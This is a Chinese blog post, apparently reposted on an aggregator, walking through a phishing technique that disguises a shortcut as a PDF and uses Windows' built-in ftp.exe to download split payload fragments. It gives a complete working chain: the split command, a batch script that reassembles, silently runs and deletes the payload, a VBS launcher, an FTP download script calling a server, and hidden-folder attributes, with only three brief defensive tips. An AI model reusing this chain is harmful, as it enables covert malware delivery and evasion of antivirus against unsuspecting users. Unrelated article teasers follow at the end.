FTP 快捷批处理混淆钓鱼方式利用和防范

news/2026/1/19 13:05:13/文章来源:https://www.cnblogs.com/yeyvzhian/p/19501196

免责声明:本文所涉及的技术仅供学习和参考,严禁使用本文内容从事违法行为和未授权行为,如因个人原因造成不良后果,均由使用者本人负责,作者及本博客不承担任何责任。

前言

FTP 快捷批处理混淆钓鱼是一种文件分片 + 合法进程代理的攻击手法,核心是通过.link快捷方式调用系统自带的ftp.exe,配合分片存储的批处理脚本,实现恶意载荷的隐蔽执行。这种方式不需要将木马文件一次性传入到Windows终端,通过Windows自带的ftp下载恶意木马,且文件无明显病毒特征。本文章主要讲述该钓鱼的原理方法和防范,不涉及过多的免杀技术。

利用原理

首先需要一台公网FTP服务器,用于存储分片载荷和脚本文件,确保FTP服务器处于启动状态。

ScreenShot_2026-01-19_102551_755
生成木马文件,这里以执行calc.exe为演示,生成.exe文件。

ScreenShot_2026-01-19_102727_611
接下来开始制作分片,使用linux的split命令以2K为一个分片切割.exe,这里也可以以其他大小进行切割,会根据切割的大小生成对应数量的文件。

sudo split -b 2k calc.exe part

生成两个文件重命名成.txt。

ScreenShot_2026-01-19_104729_645
创建payload执行脚本run.bat

@echo off
cd /d C:\Users\shuye\AppData\Local\Temp
copy /b part1.txt+part2.txt payload.exe >nul 2>&1
start /min payload.exe
del part1.txt /f /q
del part2.txt /f /q
del run.bat /f /q
del payload.exe /f /q
exit

这里主要内容是切换到C:\Users\shuye\AppData\Local\Temp临时文件目录,将分片文件重新合成为.exe,然后运行.exe,运行完成后删掉所有对应文件。

创建启动脚本ftp_run.vbs

OptionExplicit
Dim objShell, strFTPPath, strFTPScript, strTempBat, strCurrentScript
strFTPPath = "C:\Windows\System32\ftp.exe"
strFTPScript = ".\ftp_run.txt"
strTempBat = "C:\Users\shuye\AppData\Local\Temp\run.bat"
strCurrentScript = WScript.ScriptFullName
Set objShell = CreateObject("WScript.Shell")
objShell.Run Chr(34) & strFTPPath & Chr(34) & " -s:" & Chr(34) & strFTPScript & Chr(34), 0, True
objShell.Run Chr(34) & strTempBat & Chr(34), 0, True
WScript.Sleep 1000'
OnErrorResumeNext
OnErrorGoTo0
Set objShell = Nothing

调用Windows的ftp.exe,设置ftp登录配置为ftp_run.txt,执行ftp下载木马,执行run.bat脚本。

创建ftp登录配置文件ftp_run.txt

open 192.168.80.129 21
anonymous
anonymous
binary
lcd C:\Users\shuye\AppData\Local\Temp
get part1.txt
get part2.txt
get run.bat
bye

打开FTP服务器的对应IP端口,这里使用匿名用户登录,保存到本地C:\Users\shuye\AppData\Local\Temp目录,从FTP服务器下载分片文件和run.bat脚本。

接下来需要在Windows上进行操作,创建文件夹__PDF,将ftp_run.txt和ftp_run.vbs拷贝到该目录下并重命名,这里文件夹名和重命名可以随便填写,最好是填写一些伪装性较高的名字。

ScreenShot_2026-01-19_110545_549

ScreenShot_2026-01-19_110607_231
使用命令进行系统级隐藏__PDF文件夹,这样及时点击了显示隐藏文件也看不到该隐藏文件:

attrib +H +S "C:\Users\shuye\Desktop\新建文件夹\__PDF"

创建一个快捷方式:

ScreenShot_2026-01-19_111644_157
起始位置清空,目标填写:

C:\Windows\System32\wscript.exe ".\__PDF\PDF.vbs" && exit

设置图标,这里使用edge的pdf图标,64位默认edge图标的路径为C:\Program Files (x86)\Microsoft\Edge\Application{版本号}\msedge.dll,设置pdf图片:

ScreenShot_2026-01-19_112109_580
重命名一下:

ScreenShot_2026-01-19_112159_189
压缩成压缩包,然后放到靶机上解压运行:

ScreenShot_2026-01-19_112259_605
成功执行命令:

ScreenShot_2026-01-19_112321_230

实战中,vbs脚本可以换成python脚本,将python源文件一并打包到压缩包隐藏文件夹中,然后改用shellcode的方式将命令注入到内存中可以进行有效免杀,这里由于技术复杂度本篇文章不做详细介绍。

如何防范

1.部署杀软/EDR,保持最新版本更新,可以有效识别钓鱼文件,不过对于深度免杀的木马效果可能不明显。
2.通过第三方压缩软件如Bandizip可以看到隐藏文件

ScreenShot_2026-01-19_113638_406
3.查看文件属性确认是否为文档

ScreenShot_2026-01-19_113931_097

总结

FTP 快捷批处理混淆钓鱼也算是一种常见的钓鱼方式了,该方法最大的优势就是利用原生应用程序去下载外部的恶意程序,有很好的混淆和绕过效果,通过分片的方式将完整的恶意程序切割成多个分片,大大减少被静态杀软识别的可能性。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1183124.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

70_Spring AI 干货笔记之 STDIO 与 SSE MCP 服务器

一、STDIO 与 SSE MCP 服务器 STDIO 和 SSE MCP 服务器支持多种传输机制,每种都有专门的启动器。 使用 STDIO 客户端或 SSE 客户端连接 STDIO 和 SSE 服务器。 1.1 STDIO MCP 服务器 支持完整 MCP 服务器功能,采用 STDIO 服务器传输。 <dependency> <groupId>…

2026年湖北襄阳、十堰等地家用别墅电梯生产商排名,哪家更靠谱? - 工业品牌热点

本榜单依托行业深度调研与真实用户口碑,结合别墅电梯用户核心痛点(空间适配、噪音干扰、安全隐患、定制不足等),筛选出五家专业家用别墅电梯生产商,为家庭垂直出行需求提供客观选型参考,助力精准匹配适配的服务伙…

基于STM32单片机MPU6050陀螺仪角度加速度无线摄像头设计套件24X(设计源文件+万字报告+讲解)(支持资料、图片参考_相关定制)_文章底部可以扫码

基于STM32单片机MPU6050陀螺仪角度加速度无线摄像头设计套件24X STM32单片机陀螺仪MPU6050角度报警器加速度024X产品功能描述&#xff1a; 本系统由STM32F103C8T6单片机核心板、TFT1.44寸彩屏液晶显示电路、MPU6050数据采集电路、&#xff08;无线蓝牙/WIFI模块-可选&#xff0…

基于大数据网易云音乐排行榜数据分析系统设计与实现

目录大数据网易云音乐排行榜数据分析系统设计与实现开发技术路线相关技术介绍核心代码参考示例结论源码lw获取/同行可拿货,招校园代理 &#xff1a;文章底部获取博主联系方式&#xff01;大数据网易云音乐排行榜数据分析系统设计与实现 该系统基于大数据技术&#xff0c;对网易…

生命死亡之谜:为什么灯塔水母可以长生不老?

第二十七章&#xff1a;揭秘死亡之谜一开始&#xff0c;我在犹豫要不要写这一章&#xff0c;因为我毫无头绪。死亡之谜&#xff0c;是生命的终极谜题。自古至今很多智人曾经想揭开它的谜团&#xff0c;可是都没有成功。到底生命为什么会死亡&#xff1f;我希望你在看过这一章之…

视频创作万能工具箱,Sora2源码整合生成、编辑、优化全流程

温馨提示&#xff1a;文末有资源获取方式2025年下半年&#xff0c;AI视频生成领域迎来颠覆性变革。全新一代模型的发布&#xff0c;标志着高质量、高一致性的AI视频生成时代正式到来&#xff0c;一个万亿级别的全新市场正在打开。对于创业者、开发者及企业而言&#xff0c;这不…

Sora2万能创作系统源码,助您快速部署自有平台

温馨提示&#xff1a;文末有资源获取方式OpenAI再次以颠覆性技术震撼全球&#xff0c;其新一代视频模型被誉为视频领域的“GPT-3.5时刻”。它解决了以往AI视频动作僵硬、逻辑混乱、音画不同步的顽疾&#xff0c;带来了物理自洽、多镜头连贯的影院级生成效果。这不仅是一场技术革…

基于51/STM32单片机录音笔语音录放存储音频ISD4004无线APP设计(设计源文件+万字报告+讲解)(支持资料、图片参考_相关定制)_文章底部可以扫码

基于51/STM32单片机录音笔语音录放存储音频ISD4004无线APP设计 51-C284段录音4段播放ISD4004模块麦克音频放大OLED屏按键(无线方式选择)51-C028N无无线-无APP版: 51-C028B蓝牙无线-APP版: 51-C028W-WIFI无线-APP版: 51-C028CAN-视频监控WIFI无线-APP版: 产品功能描述&#xff1…

开源可商用的Sora2视频生成系统源码,全能AI视频创作平台

温馨提示&#xff1a;文末有资源获取方式技术自主与完全控制权100%源码授权&#xff1a;提供从前端到后端的所有源代码&#xff0c;无任何加密或核心功能阉割&#xff0c;您拥有完全的修改、学习和二次开发权利。安全私有化部署&#xff1a;可将整套系统部署于自有机房或私有云…

成都婚纱照推荐|沐纱映画:以“静奢风”定义高级质感,匠心珍藏幸福光影 - charlieruizvin

成都婚纱照口碑推荐|沐纱映画:以“静奢风”定义高级质感,匠心珍藏幸福光影在成都婚嫁市场的璀璨星河中,成都沐纱映画如一颗温润而闪耀的明珠,凭借其无可替代的专业底蕴与浸透暖意的匠心,成为无数新人铭刻爱情的首…

基于51单片机地震/电动车震动检测防盗语音报警器设计/DIY套件131(设计源文件+万字报告+讲解)(支持资料、图片参考_相关定制)_文章底部可以扫码

基于51单片机地震/电动车震动检测防盗语音报警器设计/DIY套件13151单片机地震震动检测语音报警器检测系统131 产品功能描述&#xff1a; 本系统由STC89C52单片机、语音模块、短接检测及电源组成。 1、如果两根线短接了&#xff0c;则语音一直报警。除非按下复位按键或者断开电源…

基于YOLOv8/YOLOv7/YOLOv6/YOLOv5的车型识别与计数系统(深度学习模型+UI界面代码+训练数据集)

摘要 随着智能交通系统和自动驾驶技术的快速发展&#xff0c;车型识别与计数已成为智慧城市建设、交通管理、智能停车等领域的关键技术。本文提出了一种基于YOLO&#xff08;You Only Look Once&#xff09;系列深度学习模型的车型识别与计数系统&#xff0c;涵盖YOLOv8、YOLO…

2026年辽宁非标封头厂家定制费用分析,新乡市光大机械收费合理 - 工业品牌热点

在工业制造的精密链条中,封头作为压力容器、锅炉设备的心脏部件,其质量直接关乎生产安全与企业效益。面对市场上良莠不齐的封头加工厂,如何避开材质偷工减料、成形缺陷、精度偏差等坑点?以下结合封头加工的核心痛点…

Wolfspeed 取得 300mm SiC 重大突破

科技界迎来革命性突破&#xff01;Wolfspeed近日成功攻克半导体制造领域的技术高峰&#xff0c;犹如攀登者首次登顶珠穆朗玛峰般&#xff0c;向全球展示了单晶300毫米&#xff08;12英寸&#xff09;碳化硅&#xff08;SiC&#xff09;晶圆的制造工艺。这一里程碑式的成就&…

PyPy魔法:JIT编译器如何让Python代码飞起来

目录 摘要 1 引言&#xff1a;从性能瓶颈到性能突破的蜕变 1.1 Python性能瓶颈的本质 1.2 PyPy的架构价值定位 2 PyPy核心技术原理深度解析 2.1 JIT编译架构设计理念 2.1.1 JIT编译工作流程 2.1.2 元跟踪JIT技术 2.2 PyPy与CPython架构对比 2.2.1 执行模型对比 2.2.…

能源化工网页应用怎么集成WebUploader实现分片上传源码?

天津XX软件公司大文件传输系统前端技术方案&#xff08;第一人称视角&#xff09; 一、技术选型与架构设计 作为前端负责人&#xff0c;我主导了基于Vue3 TypeScript的模块化架构设计&#xff0c;核心解决以下痛点&#xff1a; 浏览器兼容性&#xff1a;通过分层适配策略覆…

嵌入式 Linux 开发入门:搭建交叉编译环境与第一个应用程序开发

嵌入式Linux系统已成为现代智能设备的核心技术架构&#xff0c;广泛应用于工业控制、消费电子、医疗设备和汽车电子等领域。根据Linux基金会2023年报告&#xff0c;超过70%的嵌入式设备采用基于Linux的操作系统。与传统桌面开发不同&#xff0c;嵌入式开发面临处理器架构差异、…

基于STM32单片机智能可见光数字通信音频通信光线收发设计25-125(设计源文件+万字报告+讲解)(支持资料、图片参考_相关定制)_文章底部可以扫码

基于STM32单片机智能可见光数字通信音频通信光线收发设计25-125(设计源文件万字报告讲解)&#xff08;支持资料、图片参考_相关定制&#xff09;_文章底部可以扫码25-125、基于STM32单片机可见光通信系统自适应光线数据收发设计可见光音频通信设计 本系统由可见光发射板和可见光…

保险网页项目怎么用javascript实现大文件分片上传及断点续传源码?

大文件传输系统技术方案设计 项目背景与需求分析 作为北京XX软件公司的项目负责人&#xff0c;近期产品部门提出了大文件传输系统的需求。经过与各业务部门的需求沟通和技术评估&#xff0c;我们面临以下核心挑战&#xff1a; 超大文件处理&#xff1a;需支持50GB以上文件的…

基于深度学习YOLOv10的肺炎检测系统(YOLOv10+YOLO数据集+UI界面+Python项目源码+模型)

一、项目介绍 项目背景: 肺炎是一种常见的呼吸道感染疾病&#xff0c;早期诊断对于治疗和预后至关重要。传统的肺炎诊断方法主要依赖胸部X光片和医生的经验判断&#xff0c;效率较低且容易受到主观因素的影响。随着计算机视觉和深度学习技术的发展&#xff0c;基于图像的目标检…